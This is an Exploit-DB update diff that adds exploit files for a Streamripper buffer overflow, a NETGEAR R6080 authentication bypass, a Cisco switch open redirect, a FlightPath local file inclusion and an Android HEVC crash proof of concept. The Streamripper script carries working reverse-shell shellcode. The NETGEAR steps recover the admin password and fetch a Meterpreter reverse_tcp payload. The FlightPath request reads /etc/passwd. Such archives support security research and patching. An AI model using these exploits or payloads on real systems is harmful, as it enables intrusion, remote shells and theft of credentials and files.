DB: 2019-07-16

6 changes to exploits/shellcodes

Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write
Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)

Streamripper 2.6 - 'Song Pattern' Buffer Overflow
NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass
CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities
FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion

exploits/android/dos/47119.txt

@@ -0,0 +1,79 @@
+CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) #exploit #rce #android #stagefright #cve
+
+
+More infos
+LineageOS (Android):
+
+02-11 20:18:48.238   260   260 D FFmpegExtractor: ffmpeg detected media content as 'video/hevc' with confidence 0.08
+02-11 20:18:48.239   260   260 I FFMPEG  : [hevc @ 0xb348f000] Invalid tile widths.
+02-11 20:18:48.239   260   260 I FFMPEG  : [hevc @ 0xb348f000] PPS id out of range: 0
+02-11 20:18:48.240   260   260 I FFMPEG  : [hevc @ 0xb348f000] Invalid tile widths.
+02-11 20:18:48.240   260   260 I FFMPEG  : [hevc @ 0xb348f000] PPS id out of range: 0
+02-11 20:18:48.240   260   260 I FFMPEG  : [hevc @ 0xb348f000] Error parsing NAL unit #5.
+02-11 20:18:48.240   260   260 I FFMPEG  : [hevc @ 0xb348f000] Invalid tile widths.
+mplayer (laptop)
+
+id: 0
+[hevc @ 0x7f0bf58a7560]Decoding VPS
+[hevc @ 0x7f0bf58a7560]Main profile bitstream
+[hevc @ 0x7f0bf58a7560]Decoding SPS
+[hevc @ 0x7f0bf58a7560]Main profile bitstream
+[hevc @ 0x7f0bf58a7560]Decoding VUI
+[hevc @ 0x7f0bf58a7560]Decoding PPS
+[hevc @ 0x7f0bf58a7560]Invalid tile widths.
+[hevc @ 0x7f0bf58a7560]Decoding SEI
+[hevc @ 0x7f0bf58a7560]Skipped PREFIX SEI 5
+[hevc @ 0x7f0bf58a7560]PPS id out of range: 0
+[hevc @ 0x7f0bf58a7560]Error parsing NAL unit #5.
+Error while decoding frame!
+This stops it when the tile width is bigger than allowed: https://gitlab.freedesktop.org/gstreamer/meson-ports/ffmpeg/blob/ebf648d490448d511b5fe970d76040169e65ef74/libavcodec/hevc_ps.c#L1526
+
+So the check are there.
+
+On stock/google Andoird I think it will use libhevc, not ffmpeg, when using VideoPlayer.
+
+https://www.droidviews.com/enjoy-hevc-h-265-video-playback-on-android/
+
+I have the google codec:
+
+OMX.google.hevc.decoder
+
+I am wondering however why it does not crash ....
+
+Attaching the video (videopoc.mp4) that should trigger this condition:
+
+if (value >= ps_sps->i2_pic_wd_in_ctb - start)
++                        {
++                            return IHEVCD_INVALID_HEADER;
++                        }
+Maybe somebody have more luck.
+
+More infos 2
+Whoooo hooo .... made it :)
+
+Proof of concept is in hevc-crash-poc.mp4, other videos are for non andoird players.
+
+Hvec-"fright" is possible. You can own the mobile by viewing a video with payload. In my example I didn't include real payload.
+
+07-13 21:50:59.000  3351  3351 I /system/bin/tombstoned: received crash request for pid 24089
+07-13 21:50:59.006 24089 24089 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+07-13 21:50:59.006 24089 24089 F DEBUG   : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:user/release-keys'
+07-13 21:50:59.006 24089 24089 F DEBUG   : Revision: '9'
+07-13 21:50:59.006 24089 24089 F DEBUG   : ABI: 'arm64'
+07-13 21:50:59.006 24089 24089 F DEBUG   : pid: 24089, tid: 24089, name: media.extractor  >>> mediaextractor <<<
+07-13 21:50:59.006 24089 24089 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050
+07-13 21:50:59.009 24089 24089 F DEBUG   :     x0   00000000ffffff36  x1   0000000000000000  x2   00000000000000f0  x3   0000000000000001
+07-13 21:50:59.009 24089 24089 F DEBUG   :     x4   0000000000000001  x5   0000007ccb5df1b8  x6   0000007cc927363e  x7   0000007cc8e7bd04
+07-13 21:50:59.009 24089 24089 F DEBUG   :     x8   0000000000004170  x9   0000000000004160  x10  00000000ffffffff  x11  0000007ccb7fbef0
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x12  0000007ccb5d3ce0  x13  000000000000001e  x14  0000000000000003  x15  0000000000000001
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x16  0000007cc99f5f50  x17  0000007ccb88885c  x18  0000007ccb566225  x19  0000007ccb562020
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x20  0000007ccb4f18a0  x21  0000007ccb468c6c  x22  0000000000000000  x23  0000000000000006
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x24  000000000000001e  x25  0000000000000094  x26  0000000000004160  x27  0000000000000001
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x28  0000007ccb55e750  x29  0000007fd6d39d90  x30  0000007cc99c4438
+07-13 21:50:59.010 24089 24089 F DEBUG   :     sp   0000007fd6d39d20  pc   0000007cc99c44c4  pstate 0000000080000000
+07-13 21:50:59.013 24089 24089 F DEBUG   : 
+--
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47119.zip

exploits/hardware/webapps/47117.txt

@@ -0,0 +1,77 @@
+# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Date: 13/07/2019
+# Exploit Author: Wadeek
+# Hardware Version: R6080-100PES
+# Firmware Version: 1.0.0.34 / 1.0.0.40
+# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+
+== Files Containing Juicy Info ==
+>> http://192.168.1.1/currentsetting.htm
+Firmware=V1.0.0.34WW
+Model=R6080
+>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+<serialNumber>SSSSSSSNNNNNN</serialNumber>
+
+== Security Questions Bypass > Answers Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+<POST REQUEST>
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
+<POST RESPONSE>
+<input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
+<input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
+(repeat recovery process for get admin password)
+
+== Authenticated Telnet Command Execution ==
+>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6080 login: admin
+Password: Str0nG-!P4ssW0rD
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}
+
+
+
+# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Date: 13/07/2019
+# Exploit Author: Wadeek
+# Hardware Version: R6080-100PES
+# Firmware Version: 1.0.0.34 / 1.0.0.40
+# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+
+== Files Containing Juicy Info ==
+>> http://192.168.1.1/currentsetting.htm
+Firmware=V1.0.0.34WW
+Model=R6080
+>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+<serialNumber>SSSSSSSNNNNNN</serialNumber>
+
+== Security Questions Bypass > Answers Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+<POST REQUEST>
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
+<POST RESPONSE>
+<input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
+<input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
+(repeat recovery process for get admin password)
+
+== Authenticated Telnet Command Execution ==
+>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6080 login: admin
+Password: Str0nG-!P4ssW0rD
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}

exploits/hardware/webapps/47118.txt

@@ -0,0 +1,121 @@
+# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
+# Shodan query: /config/log_off_page.html
+# Discovered Date: 07/03/2014
+# Reported Date: 08/04/2019
+# Exploit Author: Ramikan 
+# Website: http://fact-in-hack.blogspot.com
+# Vendor Homepage:https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html
+# Affected Devices:  The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled, 
+# Tested On: Cisco C300 Switch
+# Version: 1.3.7.18
+# CVE : CVE-2019-1943
+# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
+# Category:Hardware, Web Apps
+# Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
+
+*************************************************************************************************************************************
+
+Vulnerability 1: Information Gathering
+
+*************************************************************************************************************************************
+
+Unauthenticated user can find the version number and device type by visiting this link directly.
+
+Affected URL:
+
+/cs703dae2c/device/English/dictionaryLogin.xml
+
+*************************************************************************************************************************************
+
+Vulnerability 2: Open Redirect due to host header.
+
+*************************************************************************************************************************************
+
+Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting.
+
+Normal Request
+
+GET / HTTP/1.1
+Host: 10.1.1.120
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+Normal Response
+
+HTTP/1.1 302 Redirect
+Server: GoAhead-Webs
+Date: Fri Mar 07 09:40:22 2014
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: https://10.21.151.120/cs703dae2c/
+
+<html><head></head><body>
+                        This document has moved to a new <a href="https://10.1.1.120/cs703dae2c/">location</a>.
+                        Please update your documents to reflect the new location.
+                        </body></html>
+*************************************************************************************************************************************
+POC 
+*************************************************************************************************************************************
+
+Host Header changed to different domain (example google.com).
+
+Request:
+
+GET /cs703dae2c HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: activeLangId=English; isStackableDevice=false
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 302 Redirect
+activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
+Date: Fri Mar 07 09:45:26 2014
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: http://google.com/cs703dae2c/config/log_off_page.htm
+
+<html><head></head><body>
+                        This document has moved to a new <a href="http://google.com/cs703dae2c/config/log_off_page.htm">location</a>.
+                        Please update your documents to reflect the new location.
+                        </body></html>
+
+
+The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker need to be in same network and should be able to modify the victims request on the wire in order to trigger this vulnerabilty.
+
+*************************************************************************************************************************************
+Attack Vector:
+*************************************************************************************************************************************
+Can be used for domain fronting.
+
+curl -k --header "Host: attack.host.net" "domainname of the cisco device"
+
+
+*************************************************************************************************************************************
+Vendor Response:
+*************************************************************************************************************************************
+
+Issue 1:
+Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.
+
+Issue 2:
+The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.
+
+We have assigned CVE CVE-2019-1943 for this issue.
+
+Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
+*************************************************************************************************************************************

exploits/php/webapps/47121.txt

@@ -0,0 +1,33 @@
+# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
+# Date: 07-07-2019
+# Exploit Author: Mohammed Althibyani
+# Vendor Homepage: http://getflightpath.com
+# Software Link: http://getflightpath.com/project/9/releases
+# Version: < 4.8.2 & < 5.0-rc2
+# Tested on: Kali Linux
+# CVE : CVE-2019-13396
+
+
+# Parameters : include_form
+# POST Method:
+
+use the login form to get right form_token [ you can use wrong user/pass ]
+
+This is how to POST looks like:
+
+POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+
+callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login
+
+
+# modfiy the POST request to be:
+
+
+POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+
+callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
+
+
+
+
+# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.

exploits/windows/local/47116.py

@@ -0,0 +1,70 @@
+#!/usr/bin/python
+
+#Exploit Title: StreamRipper32 Buffer Overflow
+#Date: 07/2019
+#Exploit Author: Andrey Stoykov (OSCP)
+#Tested On: Win7 SP1 x64
+#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
+#Version: 2.6
+#Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern"
+
+file = open('exploit.txt', 'wb')
+
+#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6  EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe" -f c
+
+shellcode = ("\xdb\xd7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" +
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +
+"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" +
+"\x4a\x49\x39\x6c\x48\x68\x4b\x39\x53\x30\x65\x50\x63\x30" +
+"\x45\x30\x4f\x79\x6b\x55\x64\x71\x4b\x62\x42\x44\x4e\x6b" +
+"\x50\x52\x44\x70\x4e\x6b\x61\x42\x76\x6c\x4e\x6b\x61\x42" +
+"\x52\x34\x6c\x4b\x54\x32\x46\x48\x56\x6f\x6e\x57\x70\x4a" +
+"\x37\x56\x35\x61\x79\x6f\x56\x51\x4f\x30\x4c\x6c\x57\x4c" +
+"\x31\x71\x71\x6c\x46\x62\x46\x4c\x77\x50\x6f\x31\x38\x4f" +
+"\x66\x6d\x73\x31\x6b\x77\x79\x72\x78\x70\x66\x32\x33\x67" +
+"\x6e\x6b\x43\x62\x34\x50\x4c\x4b\x43\x72\x75\x6c\x57\x71" +
+"\x5a\x70\x6c\x4b\x61\x50\x30\x78\x6f\x75\x39\x50\x32\x54" +
+"\x63\x7a\x36\x61\x4a\x70\x36\x30\x4c\x4b\x51\x58\x34\x58" +
+"\x4c\x4b\x76\x38\x75\x70\x53\x31\x5a\x73\x79\x73\x35\x6c" +
+"\x32\x69\x6e\x6b\x66\x54\x4e\x6b\x56\x61\x49\x46\x35\x61" +
+"\x49\x6f\x74\x71\x6b\x70\x4c\x6c\x49\x51\x7a\x6f\x64\x4d" +
+"\x55\x51\x79\x57\x54\x78\x49\x70\x32\x55\x58\x74\x44\x43" +
+"\x73\x4d\x4b\x48\x55\x6b\x33\x4d\x76\x44\x33\x45\x6b\x52" +
+"\x66\x38\x6c\x4b\x53\x68\x44\x64\x35\x51\x38\x53\x73\x56" +
+"\x4c\x4b\x54\x4c\x70\x4b\x4c\x4b\x32\x78\x77\x6c\x35\x51" +
+"\x5a\x73\x6e\x6b\x65\x54\x4c\x4b\x76\x61\x7a\x70\x4e\x69" +
+"\x30\x44\x44\x64\x61\x34\x71\x4b\x73\x6b\x53\x51\x61\x49" +
+"\x62\x7a\x42\x71\x4b\x4f\x59\x70\x52\x78\x53\x6f\x62\x7a" +
+"\x6c\x4b\x57\x62\x4a\x4b\x4f\x76\x73\x6d\x51\x78\x74\x73" +
+"\x36\x52\x37\x70\x45\x50\x52\x48\x64\x37\x31\x63\x35\x62" +
+"\x33\x6f\x33\x64\x43\x58\x62\x6c\x33\x47\x36\x46\x37\x77" +
+"\x39\x6f\x7a\x75\x6f\x48\x6e\x70\x73\x31\x35\x50\x53\x30" +
+"\x45\x79\x68\x44\x43\x64\x46\x30\x32\x48\x56\x49\x6d\x50" +
+"\x72\x4b\x33\x30\x39\x6f\x39\x45\x50\x50\x52\x70\x76\x30" +
+"\x36\x30\x67\x30\x46\x30\x53\x70\x72\x70\x51\x78\x49\x7a" +
+"\x56\x6f\x39\x4f\x49\x70\x69\x6f\x78\x55\x6b\x39\x6b\x77" +
+"\x62\x48\x49\x50\x6f\x58\x54\x78\x53\x36\x50\x68\x73\x32" +
+"\x45\x50\x66\x71\x31\x4c\x4d\x59\x79\x76\x42\x4a\x64\x50" +
+"\x72\x76\x62\x77\x65\x38\x6e\x79\x6e\x45\x42\x54\x73\x51" +
+"\x69\x6f\x78\x55\x61\x78\x35\x33\x30\x6d\x51\x74\x57\x70" +
+"\x6b\x39\x4d\x33\x43\x67\x31\x47\x36\x37\x66\x51\x69\x66" +
+"\x71\x7a\x75\x42\x32\x79\x62\x76\x59\x72\x69\x6d\x52\x46" +
+"\x4b\x77\x51\x54\x31\x34\x65\x6c\x77\x71\x55\x51\x6c\x4d" +
+"\x30\x44\x74\x64\x56\x70\x49\x56\x57\x70\x53\x74\x72\x74" +
+"\x32\x70\x42\x76\x50\x56\x70\x56\x51\x56\x32\x76\x42\x6e" +
+"\x66\x36\x33\x66\x73\x63\x66\x36\x45\x38\x64\x39\x58\x4c" +
+"\x55\x6f\x4c\x46\x79\x6f\x79\x45\x6e\x69\x69\x70\x42\x6e" +
+"\x61\x46\x77\x36\x49\x6f\x30\x30\x35\x38\x45\x58\x4c\x47" +
+"\x45\x4d\x51\x70\x79\x6f\x38\x55\x4d\x6b\x4b\x50\x65\x4d" +
+"\x57\x5a\x55\x5a\x73\x58\x49\x36\x4c\x55\x6d\x6d\x4d\x4d" +
+"\x59\x6f\x6a\x75\x77\x4c\x64\x46\x73\x4c\x77\x7a\x4b\x30" +
+"\x59\x6b\x59\x70\x50\x75\x33\x35\x6f\x4b\x61\x57\x46\x73" +
+"\x62\x52\x70\x6f\x61\x7a\x45\x50\x33\x63\x69\x6f\x78\x55" +
+"\x41\x41")
+
+
+#74302E3F  comctl32.DLL
+buffer = "A"*256 + "\x3f\x2e\x30\x74" + "\x90"*10 + shellcode + "C"*(260-256-4-10)
+file.write(buffer)
+file.close()

files_exploits.csv

@@ -6507,6 +6507,8 @@ id,file,description,date,author,type,platform,port
 47102,exploits/windows/dos/47102.txt,"Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays",2019-07-10,"Google Security Research",dos,windows,
 47103,exploits/windows/dos/47103.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings",2019-07-10,"Google Security Research",dos,windows,
 47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows,
+47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
+47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10589,6 +10591,7 @@ id,file,description,date,author,type,platform,port
 47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
 47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
+47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41493,3 +41496,6 @@ id,file,description,date,author,type,platform,port
 47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java,
 47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java,
 47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi,
+47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
+47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
+47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80